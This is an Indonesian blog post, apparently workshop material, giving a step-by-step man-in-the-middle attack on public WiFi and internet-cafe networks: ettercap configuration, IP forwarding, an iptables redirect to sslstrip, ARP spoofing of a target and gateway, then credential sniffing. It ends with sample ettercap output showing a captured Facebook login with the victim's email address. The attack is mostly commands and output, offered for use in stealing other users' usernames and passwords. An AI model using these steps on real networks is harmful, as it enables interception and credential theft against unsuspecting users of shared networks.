Polisi Belajar nge Blog…

Isi konten artikel ini sebagai panduan pada kegiatan yang diadakan deadc0de goes to school, di materi ini tentang bagaimana melakukan penyadapan dalam jaringan publik baik itu wifi seperti area hotspot yang banyak ditemukan di makassar, maupun lan,seperti pada jaringan warnet dalam kaitannya tentang bagaimana mengcapture atau menangkap data-data komunikasi SSl (transport secure layer) sehingga pada hasil ahir yang kita dapatkan adalah menangkap username maupun password client dalam jaringan, nah dibawah ini adalah langkah-langkah yang kita lakukan :

Semua tools yang saya gunakan disini sudah terinclude di sistem operasi Backtrack RC1

di konsole kita ketikkan perintah :

root@deadc0de:~# nano /etc/etter.conf

untuk melakukan editing konfigurasi ettercap,pada bagian priv saya ubah nilainya menjadi 0, agar ettercap melakukan tugasnya dengan bersih,

[privs]

ec_uid = 0                # nobody is the default 65534

ec_gid = 0                # nobody is the default 65534

kemudian dibagian redir_command kita hilangkan tanda pagar di bagian iptables agar ettercap mengaktifkan fungsi redir_command

# if you use iptables:

redir_command_on = “iptables -t nat -A PREROUTING -i %iface -p tcp –dport $

redir_command_off = “iptables -t nat -D PREROUTING -i %iface -p tcp –dport$

nah, cukup pada bagian konfigurasi ettercap, kita tutup dan save dengan menekan CTRL + x kemudian memilih Y dan enterselanjutnya kita aktifkan IP Forward dengan perintah

root@bt:~# echo 1 > /proc/sys/net/ipv4/ip_forward

kemudian melakukan setting pada firewall kita agar koneksi pada port default akses web (80) kita redirect ke port SSLSTRIP yang kita gunakan untuk menterjemahkan akses HTTPS ke HTTP, dengan perintah

root@bt:~# iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 10000

nah bagian berikutnya adalah melakukian proses scanning jaringan, untuk mengetahui ip adress yang hidup, saya mengasumsikan telah melakukan scanning dengan nmap dan mendapatkan calon target yang mempunyai ip address 192.168.1.10 dimana ip gateway jaringan saya adalah 192.168.1.1
Untuk melakukan aksi saya, pertama-tama saya akan melakukan spoofing ARP dalam jaringan dengan perintah

root@bt:~# arpspoof -i wlan0 -t 192.168.1.10 192.168.1.1

dimana opsi -i wlan0 adalah opsi untuk memilih jenis interface yang kita gunakan, wlan0 adalah jenis interface wireless saya, untuk melihat jenis interfaces yang kita gunakan, cukup memberi perintah “iwconfig”, arpspoof adalah salah satu tehnik dasar dalam serangan MITM untuk mengubah traffick komunikasi dalam jaringan.selanjutnya kita aktifkan sslstrip di tab konsole baru dengan perintah

root@bt:~# sslstrip -a -k -f

berikutnya adalah mengaktifkan ettercap di tab baru dengan perintah

root@bt:~# ettercap -T -q -i wlan0

nah… cukup sampai disini, untuk memonitoring apakah sniffing kita berhasil, tunggu sampai ada user yang melakukan login, dan pastikan jangan menutup semua tab tadi, itu yg perlu diingat, letak hasil password dan username yang terjaring berada di tab 3 atau tab kita menjalankan ettercap….

contoh hasil di tab 3 atau screen ettercap dari praktek sniffing ini

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Listening on wlan0… (Ethernet)

wlan0 ->       00:22:43:90:24:50     192.168.1.3     255.255.255.0

Privileges dropped to UID 0 GID 0…

etter.dns:41 Invalid ip address
etter.dns:42 Invalid ip address
etter.dns:43 Invalid ip address
28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Starting Unified sniffing…

Text only Interface activated…
Hit ‘h’ for inline help

HTTP : 66.220.147.31:443 -> USER: dedythytie@gmail.com  PASS: “sengaja dihilangkan karena alasan keamanan” INFO: http://www.facebook.com/